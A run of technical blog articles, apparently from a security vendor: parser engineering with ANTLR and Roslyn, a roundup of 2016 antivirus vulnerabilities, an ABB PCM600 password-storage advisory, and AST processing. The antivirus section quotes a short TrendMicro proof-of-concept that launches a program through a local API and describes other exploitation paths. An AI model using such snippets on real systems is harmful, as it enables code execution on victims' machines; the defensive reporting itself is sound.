    parser.addErrorListener(ConsoleErrorListener.INSTANCE);
    parser.setErrorHandler(new DefaultErrorStrategy());
    // try again with full LL(*)
    parser.getInterpreter().setPredictionMode(PredictionMode.LL);
    parser.startRule();
}


Roslyn errors


The following parsing errors are present in Roslyn:
  • Missing syntax; Roslyn completes the corresponding node with the IsMissing = true property value (a common example is a statement without a semicolon).
  • Incomplete member; a separate node IncompleteMember is created.
  • Incorrect value of a numeric, string, or character literal (e.g., a too-long value or an empty char): a separate node with Kind equal to NumericLiteralToken, StringLiteralToken, or CharacterLiteralToken is created.
  • Excessive syntax (e.g., an accidentally typed character): A separate node with Kind = SkippedTokensTrivia is created.
The following code fragment demonstrates these errors (you can explore the features of Roslyn using the Syntax Visualizer plugin for Visual Studio):
namespace App
{
class Program
{
; // Skipped Trivia
static void Main(string[] args)
{
a // Missing ';'
ulong ul = 1lu; // Incorrect Numeric
string s = """; // Incorrect String
char c = ''; // Incorrect Char
}
}

class B
{
c // Incomplete Member
}
}

These carefully selected types of syntax errors allow Roslyn to convert a tree containing any number of errors back to the original code, character by character.

From theory to practice



The PHP, T-SQL, and PL/SQL grammars illustrating the above theory were developed and made open source. PHP and SQL parsers use these grammars. In order to parse Java code, we used the already existing java and java8 grammars. We have also refined the C# grammar (for versions 5 and 6) used to compare parsers based on Roslyn and ANTLR. Below you will find the most interesting aspects of developing and using these grammars. Although SQL-based languages are regarded as declarative rather than imperative, the T-SQL and PL/SQL extensions provide support for imperative programming (control flow), and it is mainly these aspects that our source code analyzer targets.

Java- and Java8 grammars


In most cases, the Java 7 parser is faster than the Java 8 one, except when there is deep recursion: parsing the ManyStringConcatenation.java file, for example, takes far longer and requires more memory. This is not an artificial example; we really came across such "spaghetti code". As it turned out, the problem is caused by left-recursive grammar rules in expression. The Java 8 grammar contains only primitive recursive rules. Primitive recursive rules differ from ordinary recursive rules in that they refer to themselves on either the left or the right side of an alternative, but not on both sides simultaneously. An example of an ordinary recursive expression:
expression
: expression ('*'|'/') expression
| expression ('+'|'-') expression
| ID
;
The following rules are obtained after converting the rules above to primitive left-recursive form:
expression
: multExpression
| expression ('+'|'-') multExpression
;
multExpression
: ID
| multExpression ('*'|'/') ID
;
Or even to non-recursive ones (however, it is not so easy to handle expressions after parsing, because they are no longer binary):
expression
: multExpression (('+'|'-') multExpression)*
;
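With the non-recursive form, the flat sequence of operands and operators produced by the parser can still be folded back into left-associative binary nodes afterwards. A minimal sketch of that fold (the class and method names are ours, purely illustrative):

```java
import java.util.List;

class ExprFolder {
    // Fold a flat token list such as [a, +, b, -, c] into a
    // left-associative binary structure: ((a + b) - c).
    static String foldLeft(List<String> parts) {
        String acc = parts.get(0);
        for (int i = 1; i < parts.size(); i += 2) {
            acc = "(" + acc + " " + parts.get(i) + " " + parts.get(i + 1) + ")";
        }
        return acc;
    }
}
```

The same fold is what a post-parse step would do to rebuild binary expression nodes from the `(('+'|'-') multExpression)*` tail.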
If the operator is right-associative (e.g., exponentiation), primitive right-recursive rules are used instead. The ordinary recursive rule
expression
: expression '^' expression
| ID
;
is converted to the primitive right-recursive one:
powExpression
: ID '^' powExpression
| ID
;
On the one hand, conversion of left-recursive rules addresses the problem of excessive memory consumption and poor performance on rare files with a large number of similar expressions; on the other hand, it brings performance issues when processing other files. It is therefore advisable to use primitive recursion for expressions that may be deep (e.g., string concatenation) and ordinary recursion for all other cases (e.g., number comparison).

PHP grammar


Phalanger allows parsing PHP code on the .NET platform. However, we were not satisfied with the fact that this project is no longer actively developed and provides no Visitor interface for traversing the AST nodes (the only interface available is the Walker). We therefore decided to develop our own PHP grammar for ANTLR.

Case insensitive keywords


All tokens in PHP, except for the names of variables (which begin with '$'), are case-insensitive. In ANTLR, case insensitivity can be implemented in two ways:
  1. Declaring fragment lexical rules to define all the Latin characters and using them as follows:
    Abstract:           A B S T R A C T;
    Array: A R R A Y;
    As: A S;
    BinaryCast: B I N A R Y;
    BoolType: B O O L E A N | B O O L;
    BooleanConstant: T R U E | F A L S E;
    ...
    fragment A: [aA];
    fragment B: [bB];
    ...
    fragment Z: [zZ];
    An ANTLR fragment is a part of a token that can be used in other tokens but is not a token itself; it is "syntactic sugar" for describing tokens. Without fragments, the first token could be written as Abstract: [Aa] [Bb] [Ss] [Tt] [Rr] [Aa] [Cc] [Tt]. The advantage of this approach is that the generated lexer is independent of the runtime, since the upper- and lower-case characters are declared directly in the grammar. The downside is lower lexer performance compared to the second approach.
  2. Converting the entire input stream of characters to lower (or upper) case and feeding it to a lexer in which all tokens are described in that case. However, this conversion has to be implemented separately for each runtime (Java, C#, JavaScript, Python), as described in Implement a custom File or String Stream and Override LA. Under this approach, it is also difficult to make some tokens case-sensitive and others case-insensitive.
The first approach is used in the developed PHP grammar, since lexical analysis usually takes less time than syntactical analysis. This approach also keeps the grammar itself free of runtime-specific code, which makes porting it to other runtimes easier. Furthermore, we created the Pull Request RFC Case Insensitivity Proof of Concept to facilitate the description of case-insensitive tokens.
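The idea behind the second approach can be sketched independently of any ANTLR runtime: a wrapper around the character stream lower-cases every lookahead character, so the lexer matches only lower-case tokens while the original text is preserved. In a real project this wrapper would implement ANTLR's CharStream interface and override LA(); the stand-in below is a simplified illustration, not actual ANTLR code.

```java
// Simplified sketch of a case-folding lookahead stream. A real ANTLR
// version would implement org.antlr.v4.runtime.CharStream and delegate
// every method except LA() to the wrapped stream.
class CaseFoldingStream {
    private final String input;
    private int pos = 0;

    CaseFoldingStream(String input) { this.input = input; }

    // 1-based lookahead; returns -1 at end of input.
    int LA(int i) {
        int index = pos + i - 1;
        if (index >= input.length()) return -1;
        // The lexer sees only lower-case characters.
        return Character.toLowerCase(input.charAt(index));
    }

    void consume() { pos++; }
}
```

Token text would still be taken from the original (unfolded) input, which is why this approach keeps keywords case-insensitive without losing the original casing of identifiers.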

Lexical modes for PHP, HTML, CSS, and JavaScript

It is commonly known that PHP code inclusions may be placed anywhere in the HTML code, and the same HTML code may in turn include CSS and JavaScript code (these blocks of embedded code are known as "islands"). This applies both to ordinary PHP syntax and to the Alternative Syntax (endif, endwhile, and similar keywords instead of closing braces).
Fortunately, ANTLR provides a mechanism called "modes", which allows switching between different sets of tokens under certain conditions. For example, the SCRIPT and STYLE modes were designed to produce token streams for JavaScript and CSS (in fact, these tokens are simply ignored in this grammar), while HTML tokens are generated in DEFAULT_MODE. It is worth noting that support for the Alternative Syntax can be implemented in ANTLR without adding target code to the lexer: nonEmptyStatement includes the inlineHtml rule, which, in turn, includes the tokens received in DEFAULT_MODE:

nonEmptyStatement
: identifier ':'
| blockStatement
| ifStatement
| ...
| inlineHtml
;
...

inlineHtml
: HtmlComment* ((HtmlDtd | htmlElement) HtmlComment*)+
;

Complex context sensitive statements

We should mention that although ANTLR supports only context-free grammars, it also provides so-called "actions" containing arbitrary code, which extend the class of supported languages at least to context-sensitive ones. Such code inclusions make it possible to parse Heredoc and some other constructs.

T-SQL grammar


Despite the common "SQL" root, the T-SQL (MSSQL) and PL/SQL grammars differ greatly from each other.

We would have preferred to avoid developing our own parser for this complex language. However, the existing parsers either did not meet the criteria of full coverage and relevance (e.g., the grammar for the deprecated GOLD parser) or have closed source code (General SQL Parser). Finally, it was decided to recover the T-SQL grammar from the MSDN documentation. The result was worth it: the grammar covers many common syntactic constructions, looks neat, stays independent of the runtime, and has been tested on SQL examples from MSDN. One development difficulty was that some tokens in the grammar, such as the semicolon, are optional; in such cases, error recovery during parsing is not as smooth.

PL/SQL grammar


Refinement of the PL/SQL grammar took even less time, because a grammar already existed for ANTLR 3. The main difficulty was that it had been developed against the Java runtime. Most Java code insertions were removed, since an AST can be built without them (as mentioned earlier, semantics can be checked at another stage). Insertions such as

decimal_key
: {input.LT(1).getText().equalsIgnoreCase("decimal")}? REGULAR_ID

were replaced by the fragment tokens:

decimal_key: D E C I M A L, as described above.

C# grammar


Strange as it may seem, refining the grammar to support language versions 5 and 6 was quite a difficult task. The major concerns were string interpolation and proper processing of preprocessor directives. Because these constructs are context-dependent, the lexer and the directive-processing parser turned out to be dependent on the runtime.

Preprocessor directives


C# compiles the following code properly: the code after the first directive would not compile on its own, but it is excluded from compilation, since the false condition is never satisfied.

#if DEBUG && false
Sample of wrong code that is not compiled
var 42 = a + ;
#else
// Compiled code
var x = a + b;
#endif

In order to be processed correctly, the code is split into tokens placed in the default, COMMENTS_CHANNEL, and DIRECTIVE channels. The codeTokens list is also created; it contains the tokens actually used for parsing. Then the preprocessor parser evaluates each directive from the preprocessor tokens. Note that ANTLR allows you to write the code that evaluates complex logical expressions directly in the grammar; for more details on the implementation, see CSharpPreprocessorParser.g4. A value of true or false is calculated only for the #if, #elif, and #else directives; all remaining directives always return true, because they do not affect whether the following code is compiled. This parser also handles conditional symbols (DEBUG is defined by default).

If a directive evaluates to true, the subsequent tokens are added to the codeTokens list; otherwise they are skipped. This approach makes it possible to ignore the invalid tokens (such as var 42 = a + ; in this example) at the parsing stage. The parsing process is implemented in CSharpAntlrParser.cs.
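The filtering step can be sketched as follows (an illustration of the idea only; the names and the trivial directive handling are ours, not the actual CSharpAntlrParser code):

```java
import java.util.ArrayList;
import java.util.List;

// Illustrative sketch of the channel split: directive tokens toggle
// emission, and only tokens from active regions reach codeTokens.
class DirectiveFilter {
    static final String IF = "#if", ELSE = "#else", ENDIF = "#endif";

    // 'condition' stands in for the evaluated #if expression; the real
    // preprocessor parser computes it from the directive's own tokens.
    static List<String> codeTokens(List<String> tokens, boolean condition) {
        List<String> code = new ArrayList<>();
        boolean emit = true;
        for (String t : tokens) {
            if (t.equals(IF)) emit = condition;
            else if (t.equals(ELSE)) emit = !emit;
            else if (t.equals(ENDIF)) emit = true;
            else if (emit) code.add(t); // ordinary code token
        }
        return code;
    }
}
```

A real implementation also handles #elif, nested directives, and the COMMENTS_CHANNEL, but the emit on/off switching is the core of why `var 42 = a + ;` never reaches the parser.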

String interpolation


This feature was challenging to implement, since a closing curly bracket may either be part of an interpolated expression or terminate the expression mode. A colon, likewise, can be part of the expression or mark the end of the expression and the start of an output format specifier (for example, #0.##). Additionally, such strings may be regular, verbatim, or nested. For more details on the syntax, see the MSDN page.

The above-described items are shown in the following code, which is valid syntactically:
s = $"{p.Name} is \"{p.Age} year{(p.Age == 1 ? "" : "s")} old";
s = $"{(p.Age == 2 ? $"{new Person { } }" : "")}";
s = $@"\{p.Name}
""\";
s = $"Color [ R={func(b: 3):#0.##}, G={G:#0.##}, B={B:#0.##}, A={A:#0.##} ]";
String interpolation has been implemented using a stack that tracks the current nesting level of interpolation strings and brackets. All of this is implemented in CSharpLexer.g4.
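The core of that bookkeeping can be illustrated with a small helper (a sketch of the idea, not the actual CSharpLexer.g4 code): given the position right after the opening `{` of an interpolation hole, find the `}` that closes it, treating nested `{...}` pairs (e.g., object initializers) as part of the expression.

```java
class InterpolationScanner {
    // Returns the index of the '}' closing the interpolation hole that
    // was opened just before 'start', or -1 if braces are unbalanced.
    static int findHoleEnd(String s, int start) {
        int depth = 1; // one '{' is already open
        for (int i = start; i < s.length(); i++) {
            char c = s.charAt(i);
            if (c == '{') depth++; // nested brace: part of the expression
            else if (c == '}' && --depth == 0) return i;
        }
        return -1;
    }
}
```

The real lexer additionally has to track nested interpolated strings and format-specifier colons, which is why a stack of such counters is needed rather than a single depth variable.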

Testing


Correctness of ANTLR parsers


Obviously, there is no need to test the parsing correctness of the Roslyn parser. The ANTLR parsers, on the other hand, received a lot of testing attention.

Performance of ANTLR and Roslyn parsers


Testing was conducted in a single-threaded mode, in release configuration without the debugger attached. ANTLR 4 4.5.0-alpha003 and Roslyn (Microsoft.CodeAnalysis) 1.1.1 were tested.

WebGoat.PHP


The number of processed files: 885. Total lines: 137 248; characters: 4 461 768.

Approximate time: 00:00:31 (55% by lexer, 45% by parser).

PL/SQL Samples


The number of processed files: 175. Total lines: 1 909; characters: 55 741.
Approximate time: < 1 sec (5% by lexer, 95% by parser).

CoreFX-1.0.0-rc2


The number of processed files: 7329. Total lines: 2 286 274; characters: 91 132 116.

Approximate time:
  • Roslyn: 00:00:04
  • ANTLR: 00:00:24 (12% by lexer, 88% by parser)

Roslyn-1.1.1


The number of processed files: 6527. Total lines: 1 967 672; characters: 74 319 082.

Approximate time:
  • Roslyn: 00:00:03
  • ANTLR: 00:00:16 (12% by lexer, 88% by parser)
According to the testing results on CoreFX and Roslyn, we may conclude that the developed ANTLR-based C# parser is roughly five to six times slower than the Roslyn parser, which speaks to the great quality of the latter. It is understood that a parser created in a week as a kitchen-table effort will hardly ever compete with market giants like Roslyn, but it can be used to parse C# code in Java, Python, or JavaScript (and other future runtimes), because its parsing speed is still acceptable.

Based on the remaining tests, it can be concluded that lexing is a substantially faster stage than parsing. The exception is the PHP lexer, which spends more time on lexing than on parsing. This appears to be due to the complex logic of the lexer and its rules, not to case-insensitive keywords, since the T-SQL and PL/SQL lexers (which also contain case-insensitive keywords) are much faster than their parsers (up to 20 times). For example, if you use SHARP: NEW_LINE Whitespace* '#'; instead of SHARP: '#';, the lexer becomes 10 times slower instead of 7 times faster! This is explained by the fact that any file contains a lot of whitespace, so the lexer tries to match the # symbol at the start of every line, which significantly degrades performance (we ran into exactly this problem; checking that a directive starts a new line should instead be carried out at the semantic analysis stage).

Error handling in ANTLR and Roslyn parsers


We wrote a simple C# file containing all parsing errors in ANTLR:
namespace App
{
©
class Program
{
static void Main(string[] args)
{
a = 3 4 5;
}
}

class B
{
c
}
ANTLR errors
  • token recognition error at: '©' at 3:5
  • mismatched input '4' expecting {'as', 'is', '[', '(', '.', ';', '+', '-', '*', '/', '%', '&', '|', '^', '<', '>', '?', '??', '++', '--', '&&', '||', '->', '==', '!=', '<=', '>=', '<<'} at 8:19
  • extraneous input '5' expecting {'as', 'is', '[', '(', '.', ';', '+', '-', '*', '/', '%', '&', '|', '^', '<', '>', '?', '??', '++', '--', '&&', '||', '->', '==', '!=', '<=', '>=', '<<'} at 8:21
  • no viable alternative at input 'c}' at 15:5
  • missing '}' at 'EOF' at 15:6
As a next step, we have tested the above-mentioned file using Roslyn compiler and discovered the following errors:
  • test(3,5): error CS1056: Unexpected character '©'
  • test(8,19): error CS1002: ; expected
  • test(8,21): error CS1002: ; expected
  • test(15,5): error CS1519: Invalid token '}' in class, struct, or interface member declaration
  • test(15,6): error CS1513: } expected
The number of errors detected by Roslyn was similar to that detected by ANTLR. The first and the last errors differ only in name. The parsers have also been tested on more complex files. Roslyn clearly detects fewer errors, and those errors are more relevant. However, in simple cases such as missing or extra tokens (semicolons, brackets), ANTLR reports the correct position and description of an error. ANTLR gives consistently worse results when part of the lexer code is written manually (compilation directives, interpolated strings). For example, if we write an #if directive without any condition, the rest of the code may not be parsed correctly. In these cases, however, the parse-recovery code would have to be written manually as well (as this is a context-sensitive construct).

Memory consumption of ANTLR runtime


As mentioned above, ANTLR 4 uses an internal cache built during parsing in order to speed up parsing of subsequent files. If you process too many files (we performed a test on about 70,000 PHP files) or re-parse files in the same process, memory consumption may grow to several gigabytes. You can clear the cache using the interpreter methods lexer.Interpreter.ClearDFA() for the lexer and parser.Interpreter.ClearDFA() for the parser, either after processing a certain number of files or after memory consumption exceeds a certain threshold.

After solving the cache-clearing problem, we discovered an issue with multi-threaded parsers. In practice, we found that calling the GetAllTokens() and ClearDFA() methods from different threads on the lexer (and similarly on the parser) may, in rare cases, lead to an "Object reference not set to an instance of an object" exception. Although this behavior is due to an error in the ANTLR C# runtime, it can be worked around by locking with several readers (code parsers) and one writer (a cache cleaner). In the C# runtime, the ReaderWriterLockSlim synchronization primitive can be used for this purpose.
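The same readers-writer discipline can be sketched in the Java runtime with ReentrantReadWriteLock (an illustration of the locking pattern, not the actual fix; in C#, ReaderWriterLockSlim plays the same role):

```java
import java.util.concurrent.locks.ReentrantReadWriteLock;

class DfaCacheGuard {
    private final ReentrantReadWriteLock lock = new ReentrantReadWriteLock();

    // Many parsing threads may hold the read lock at the same time.
    void parse(Runnable doParse) {
        lock.readLock().lock();
        try { doParse.run(); } finally { lock.readLock().unlock(); }
    }

    // The cache cleaner takes the exclusive write lock, so clearing
    // the DFA cache never runs concurrently with parsing.
    void clearCache(Runnable doClear) {
        lock.writeLock().lock();
        try { doClear.run(); } finally { lock.writeLock().unlock(); }
    }
}
```

Parsing calls would wrap GetAllTokens()/parse invocations, and the cleaner would wrap the ClearDFA() calls, eliminating the race described above.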

For obvious reasons, the Roslyn parser does not consume gigabytes of memory. The peak memory consumption did not exceed 200 MB when parsing five large C# projects: aspnet-mvc-6.0.0-rc1, roslyn-1.1.1, corefx, Newtonsoft.Json-8.0.2, and ImageProcessor-2.3.0.

Conclusion


This article has covered source code parsing with ANTLR and Roslyn. Future articles will address the following:
  • Conversion of the parse trees to a unified AST using Visitor or Walker (Listener).
  • A guide to writing an easy-to-read, efficient, and user-friendly grammar in ANTLR 4.
  • Serialization and traversal of tree structures in .NET.
  • Pattern matching in a unified AST.
  • Development and use of DSL for describing patterns.

References

  • F. Yamaguchi. Modeling and Discovering Vulnerabilities with Code Property Graphs. Proceedings of the 2014 IEEE Symposium on Security and Privacy, SP, 2014.
  • Alfred V. Aho, Monica S. Lam, Ravi Sethi, and Jeffrey D. Ullman. Compilers: Principles, Techniques, and Tools. Pearson Education Inc, Sep. 2006.
  • Terence Parr. The Definitive ANTLR Reference. Pragmatic Bookshelf, 2013.
  • Terence Parr, Sam Harwell, Kathleen Fisher. Adaptive LL(*) Parsing: The Power of Dynamic Analysis. ACM New York, 2014.
  • Roslyn. https://github.com/dotnet/roslyn
  • ANTLR grammars. https://github.com/antlr/grammars-v4
  • ANTLR. https://github.com/antlr/antlr4

Author: Ivan Kochurkin, Positive Technologies

Antivirus As a Threat


Many people do not consider antivirus tools to be a threat. Antivirus software is frequently treated as a trusted application: it may reduce system performance, but it provides protection against different types of attacks. As a result, an antivirus is often the sole protection tool for the end user, while a set of antivirus products becomes the principal security measure for enterprises.

However, as with any complicated program, antiviruses are inherently vulnerable. Antivirus processes are trusted and run in privileged mode with extensive access rights, which makes antiviruses appealing to attackers, as their exploitation can lead to system compromise.
Currently, more attention is being paid to vulnerabilities in protection software, and in antiviruses in particular. The growing number of exploits found and published on exploit-db and other resources indicates that this is a growing problem.

The chart above demonstrates the number of vulnerabilities found yearly in well-known antivirus software for the last 15 years. In the 2000s, information about antivirus vulnerabilities was published rarely, but in 2015, more than 50 exploits based on such critical vulnerabilities in antiviruses as authentication bypass, privilege escalation, and remote code execution were published.

In particular, 2015 saw new vulnerabilities discovered in such products as ESET, Avast, Bitdefender, Symantec, Kaspersky Lab, FireEye, and Malwarebytes.

In addition to independent researchers, Google Project Zero started searching for vulnerabilities in protection tools in 2014 and detected a significant percentage of the vulnerabilities published in 2015. Quite logically, governmental organizations also pay attention to this issue. We previously covered reviews of Russian antivirus software performed by foreign intelligence agencies.
It is hard to forecast the frequency of vulnerabilities in antivirus software, but it is possible to make some conclusions based on exploits published in the first quarter of 2016. More details about these exploits are given below.

Attacks on Vulnerable Antiviruses

TrendMicro
On January 11, 2016, Tavis Ormandy, a researcher from the Google Security Research team, found a critical vulnerability in the TrendMicro antivirus that leads to remote code execution.

Password Manager is installed by default and launches automatically together with the antivirus. This module is written in JavaScript with node.js. It starts an RPC service that handles API requests via HTTP. The vulnerability was found in openUrlInDefaultBrowser, an API function that calls ShellExecute() without checking the transferred arguments. In other words, it allows arbitrary code execution:

x = new XMLHttpRequest()
x.open("GET", "https://localhost:49155/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe", true);
try { x.send(); } catch (e) {};

The patch was issued one week after the incident.


McAfee Application Control
On January 12, specialists from SEC Consult, an Austrian company, published a report on bypassing the security of McAfee Application Control. This application blocks the launch of apps that are not on a whitelist and is used to protect critical infrastructure. Version 6.1.3.353 on Windows was used for testing. The researchers determined how to execute arbitrary code, launch unauthorized applications, and bypass the DEP and UAC features as well as the whitelists. Additionally, they detected vulnerabilities in swin1.sys that may lead to system failure.


QuickHeal
On February 19, the researcher Csaba Fitzl wrote a proof of concept exploiting a vulnerability in the popular Indian antivirus QuickHeal 16.00. The webssx.sys driver turned out to be vulnerable (CVE-2015-8285), which can trigger a BSOD or privilege escalation. The driver was created without the FILE_DEVICE_SECURE_OPEN flag, so any user can interact with it, bypassing the ACL. The researcher determined the IOCTL code and the buffer size necessary for calling the vulnerable function. Due to insufficient checks of the data received from the input buffer, an integer overflow occurred in the arguments sent to the memcpy function.


Comodo
On February 29, Greg Linares detected a vulnerability in the GeekBuddy module of the Comodo antivirus that leads to local privilege escalation. GeekBuddy starts several processes, one of which tries to load the shfolder.dll library. Instead of a full path to the file, GeekBuddy specifies only a hard-coded library name, which makes DLL spoofing possible. If a hacker places a malicious shfolder.dll into C:\ProgramData\Comodo\lps4\temp\ and launches a client update (or waits for an automatic one), they can escalate privileges up to the SYSTEM level and fully compromise the system.


Avast
On March 4, Google Security Research published new vulnerabilities in Avast. This time, a memory corruption error in the parsing of digital certificates was discovered: Tavis Ormandy created a portable executable file whose digital signatures, when parsed, corrupted memory and crashed Avast.


McAfee VirusScan
On March 7, Maurizio Agazzini presented another McAfee vulnerability. The researcher wrote an exploit that bypasses the security restrictions of McAfee VirusScan Enterprise 8.8: a user with local administrator rights can disable the antivirus without knowing its password.

The vulnerability was fixed on February 25, although the researcher had first reported it in fall 2014.


Avira
On March 16, a critical vulnerability in the Avira antivirus was detected. Like any antivirus, Avira processes portable executable files; while testing it, researchers found a "heap underflow" vulnerability that occurred when PE section headers were parsed. If a header has a large RVA, Avira saves the calculated offset on the heap and writes attacker-controlled data (from section->PointerToRawData) into the buffer. The vulnerability leads to RCE with NT AUTHORITY\SYSTEM privileges. The patch was issued on March 18.


More Comodo
On March 19, a report on a critical vulnerability in the Comodo antivirus was published. This product contains an x86 emulator used to automatically unpack and monitor obfuscated executable files. The emulator is supposed to execute malicious code securely for a short time, letting the sample unpack itself or exhibit some behavioral feature useful for detection.

Apart from memory corruption issues, the arguments of some dangerous emulated API requests are passed to real API functions during scanning. Some wrappers extract arguments from the emulated address space and send them directly to system calls with NT AUTHORITY\SYSTEM privileges. The call results are then returned to the emulator, enabling code execution.

This allows for different types of attacks, for example, reading, deleting, listing, and using cryptographic keys, and interacting with smart cards and other devices. It is possible because the emulator forwards the arguments of the CryptoAPI functions directly to the real APIs. Moreover, the vulnerability made it possible to read registry keys via the RegQueryValueEx wrapper, whose arguments are sent directly to the real API.

The attack vector shows that an attacker can execute malicious code in the emulator just by sending an email or making a victim visit an infected website. The patch was issued on March 22.


On March 14, researchers detected a critical vulnerability in the Comodo antivirus engine. It was possible to execute arbitrary code when the antivirus unpacked malicious files protected by PackMan. PackMan is a little-known open source packer used by Comodo during scanning.

When the packer processes files compressed with certain options, compression parameters are read directly from the input file without validation. Fuzzing showed that the pksDeCodeBuffer.ptr pointer in the CAEPACKManUnpack::DoUnpack_With_NormalPack function can be made to point anywhere, which allows an attacker to free an arbitrary address via the free() function. The vulnerability allows a hacker to execute code with NT AUTHORITY\SYSTEM privileges. The patch was issued on March 22.


What to Do
Despite all of the vulnerabilities outlined above, we cannot completely abandon antivirus software. Antivirus engines analyze huge numbers of files more quickly than alternative solutions such as sandboxes, because they rely heavily on static analysis.

An effective protection system based on antiviruses should demonstrate detection accuracy and risk minimization. Here are the most promising ways to tackle this issue.

  • Scanning with several antivirus engines significantly increases the accuracy and speed of threat detection. Online services like VirusTotal can rise to the challenge but require uploading your files, which could leak information to third parties. It therefore makes sense to perform such scans on a local server, which eliminates any involvement of outside applications.
  • Security risks may be mitigated if all suspicious files are examined in an isolated and secure environment. However, modern malicious software is able to analyze a target environment and either bypass sandboxes or stay hidden. That is why it is recommended to employ honeypots: they mimic the real system, making it easy to observe malicious behavior for a prolonged period without being noticed.
  • Even after malware is detected, an antivirus is not able to trace back all the objects that were affected by it. This means that a security system should support forensic analysis functionality.

We employ these and other technologies in PT MultiScanner.

A Positive Technologies Expert Helped to Protect ABB Digital Substations from Cyberattacks


Image credit: ABB    

ABB, a Switzerland-based company that produces software for control systems in the energy industry, has acknowledged that its PCM600 product suffers from four vulnerabilities related to insecure password storage. They were detected and reported to the vendor by Ilya Karpov, an ICS security expert at Positive Technologies.

As noted in the ICS-CERT advisory, ABB's engineering software for industrial automation management (protective relays, IEDs) is deployed in electric power substations around the world. PCM600 versions up to and including 2.6 suffer from the vulnerabilities found by Ilya Karpov. Exploiting these flaws allows a low-skilled attacker or malicious software with access to a local machine that has PCM600 installed to reconfigure a project or obtain critical information that grants read and write access via OPC.

All four PCM600 vulnerabilities are related to sensitive data storage and processing:

  • CVE-2016-4511 — Weak hashing algorithms for project password storage
  • CVE-2016-4516 — Passwords are stored in plain text, if a user doesn’t readdress the dialog box for changing a project password via the configuration menu
  • CVE-2016-4524 — OPC server passwords are stored in plain text 
  • CVE-2016-4527 — Insecure transfer and storage of sensitive data in the database

ABB has already issued a hot fix for version 2.6 and released version 2.7, which resolves all reported vulnerabilities. The company recommends that customers apply the update at their earliest convenience.
Other measures include:
  • Restricting physical access to facilities for unauthorized persons
  • Forbidding direct ICS connections to the Internet
  • Forbidding the use of online services (email, messengers) at user workstations
  • Connecting to other networks exclusively via firewalls with a limited number of open ports
  • Antivirus scanning of all portable computers and storage devices prior to connecting them to control systems
You may find the details on maintaining PCM600 security in the vendor's manual.

It is worth mentioning that ABB control systems are popular in Russia. According to Positive Technologies' ICS security research, ABB products hold third place in the Russian segment of programmable logic controllers.


Tree structures processing and unified AST

The previous article in this series discussed the theory of source code parsing with ANTLR and Roslyn. It pointed out that signature-based code analysis in PT Application Inspector is divided into the following stages:
1. Parsing into a language dependent representation (abstract syntax tree, AST).
2. Converting the AST to a language independent unified format (unified AST, UAST).
3. A direct comparison with patterns described in the DSL.
The current article focuses on the second stage: AST processing using the Visitor and Listener strategies, converting an AST to the unified format, simplifying a UAST, and the algorithm for matching tree structures.

Contents

  • AST Traversing
  • Visitor and Listener
  • Grammar and Visitor in ANTLR
  • Types of nodes in a unified AST
  • Testing of converters
  • Simplifying a UAST
  • Algorithm for matching AST and patterns
  • Conclusion

AST Traversing

As is known, a parser converts the source code into an AST, a parse tree with redundant tokens removed. There are several ways of processing such a tree. Probably the easiest one is a recursive depth-first traversal of the descendants. However, this approach only works in rather simple cases, when the number of node types is small and the processing logic is straightforward. In other cases, we need to split the processing logic into separate methods. To achieve this, we use two standard mechanisms (design patterns): Visitor and Listener.
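As a language-agnostic illustration, here is what such a naive recursive traversal looks like (a Python sketch with an invented Node class, not the analyzer's actual C# code):

```python
class Node:
    """A minimal AST node: a kind plus optional children and value."""
    def __init__(self, kind, children=None, value=None):
        self.kind = kind
        self.children = children or []
        self.value = value

def walk(node):
    """Recursive depth-first traversal: the parent first, then descendants."""
    yield node.kind
    for child in node.children:
        yield from walk(child)

# if (cond) f(); as a tiny tree
tree = Node("IfStatement", [
    Node("Identifier", value="cond"),
    Node("InvocationExpression", [Node("Identifier", value="f")]),
])

print(list(walk(tree)))
# Every new node kind adds another branch to whatever consumes this stream,
# which is why Visitor/Listener splits the logic into separate methods.
```
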

Visitor and Listener

In the Visitor pattern, processing the node descendants requires invoking their traversal methods manually: if the parent has three child nodes and we call methods for only two of them, part of the subtree will not be processed. In the Listener (Walker) interface, processing methods for node descendants are called automatically. The Listener interface contains enterNode() and exitNode() methods, which are invoked when entering and exiting a given node; they are typically implemented via an event mechanism. Unlike methods in the Listener interface, Visitor methods may return objects and may even be typed. For instance, when we declare CSharpSyntaxVisitor<AstNode>, each Visit method returns an AstNode object, a common ancestor of all other nodes in a unified AST.
Thus, using the Visitor design pattern to convert the tree yields concise code, because there is no need to store information about visited nodes. The figure below shows how unnecessary HTML and CSS nodes are truncated while converting PHP; the order of traversal is indicated by numbers. Listener is usually used to aggregate data (e.g., from CSV files) and to convert one format to another (e.g., JSON -> XML). For more information, refer to The Definitive ANTLR 4 Reference.
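The contrast between the two strategies can be sketched in Python (an illustrative toy with invented node shapes and method names, not the ANTLR or Roslyn API):

```python
# A toy Visitor (methods return values; descendants are visited only when we
# call them explicitly) and a toy Listener (enter/exit hooks fire
# automatically for every node), over dict-based nodes.

class Visitor:
    def visit(self, node):
        # dispatch to visit_<Kind>, falling back to the default method
        return getattr(self, "visit_" + node["kind"], self.default_visit)(node)

    def default_visit(self, node):
        # forgetting to recurse here would silently drop a subtree
        return [self.visit(c) for c in node.get("children", [])]

class NameCollector(Visitor):
    def visit_Identifier(self, node):
        return node["name"]

class Listener:
    def walk(self, node):
        self.enter(node)
        for child in node.get("children", []):
            self.walk(child)          # children are traversed automatically
        self.exit(node)

    def enter(self, node): pass
    def exit(self, node): pass

class KindListener(Listener):
    def __init__(self):
        self.kinds = []

    def enter(self, node):
        self.kinds.append(node["kind"])

tree = {"kind": "Binary", "children": [
    {"kind": "Identifier", "name": "a"},
    {"kind": "Identifier", "name": "b"},
]}

print(NameCollector().visit(tree))    # ['a', 'b']
listener = KindListener()
listener.walk(tree)
print(listener.kinds)                 # ['Binary', 'Identifier', 'Identifier']
```
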

Differences between Visitor in ANTLR and Roslyn

Visitor and Listener implementations may differ in libraries. The table below provides details about Visitor/Listener classes and methods in Roslyn and ANTLR.

          ANTLR                               Roslyn
Visitor   AbstractParseTreeVisitor<Result>    CSharpSyntaxVisitor<Result>
Listener  IParseTreeListener                  CSharpSyntaxWalker
Default   DefaultResult                       DefaultVisit(SyntaxNode node)
Visit     Visit(IParseTree tree)              Visit(SyntaxNode node)
Both Roslyn and ANTLR have methods returning the default result (used when the Visitor method is not overridden for some syntactic structure) and a Visit method that determines which specialized Visitor method should be called.
ANTLR generates a Visitor method for every syntactic grammar rule. There are also the following special methods:
  • VisitChildren(IRuleNode node) — implements the default node traversal.
  • VisitTerminal(ITerminalNode node) — used when traversing terminal nodes, i.e. tokens.
